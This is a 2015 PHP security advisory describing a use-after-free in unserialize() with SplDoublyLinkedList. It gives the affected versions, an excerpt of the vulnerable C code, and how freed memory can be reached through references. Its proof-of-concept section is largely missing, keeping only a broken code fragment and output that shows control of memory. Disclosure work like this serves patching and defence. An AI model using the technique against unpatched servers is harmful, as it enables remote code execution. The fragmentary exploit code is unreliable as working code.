#Use After Free Vulnerability in unserialize() with SplDoublyLinkedList Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.7.30 - Release Date: 2015.8.7 > A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object's deserialization that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. Affected Versions ------------ Affected is PHP 5.6 < 5.6.12 Affected is PHP 5.5 < 5.5.28 Affected is PHP 5.4 < 5.4.44 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ ``` ALLOC_INIT_ZVAL(flags); if (!php_var_unserialize(&flags, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(flags) != IS_LONG) { zval_ptr_dtor(&flags); goto error; } intern->flags = Z_LVAL_P(flags); zval_ptr_dtor(&flags); <=== free memory ... PHP_VAR_UNSERIALIZE_DESTROY(var_hash); return; ``` The zval_ptr_dtor() leads to &flags is freed from memory. However the unserialize() will still allow to use R: or r: to set references to that already freed memory. It is possible to use-after-free attack and execute arbitrary code remotely. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.11 installation of PHP 5.4.43. ``` >= 8; } return $out; } ?> ``` Test the PoC on the command line: ``` $ php uafpoc.php array(2) { [0]=> object(SplDoublyLinkedList)#1 (2) { ["flags":"SplDoublyLinkedList":private]=> int(0) ["dllist":"SplDoublyLinkedList":private]=> array(0) { } } [1]=> int(1122334455) <=== so we can control the memory and create fake ZVAL :) } ```